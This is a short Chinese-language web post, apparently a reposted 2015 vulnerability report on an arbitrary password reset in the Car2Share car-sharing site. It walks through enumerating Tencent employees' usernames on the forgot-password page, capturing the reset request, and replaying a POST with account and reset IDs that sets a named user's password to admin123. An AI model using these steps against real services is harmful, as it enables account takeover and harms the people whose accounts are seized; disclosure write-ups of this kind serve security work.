您的位置:首页 > 其它

Car2Share任意用户密码重置(以腾讯员工账号测试)

2015-05-20 11:37 225 查看
首先登录网站

car2share.com.cn





注册,发现跳至
http://car2share.daihing.com/




忘记密码页面
http://car2share.daihing.com/daimler-main/help/forgetPwd.shtml
在用户名处我爆破出腾讯一些用户





这里用andi@tencent.com做测试





来到第二步,我们点击重新发送邮件并抓包





把画线位置保存下来





然后

POST

code 区域
http:/car2share.daihing.com/daimler-main/help/forgetPwd3.shtml

password_new1=admin123&password_new2=admin123&accountId=3b84207e5c1e11e48ea90050569b74e0&accountPwResetId=ff8080814d5702f4014d5770b7800017


成功重置密码为admin123



内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: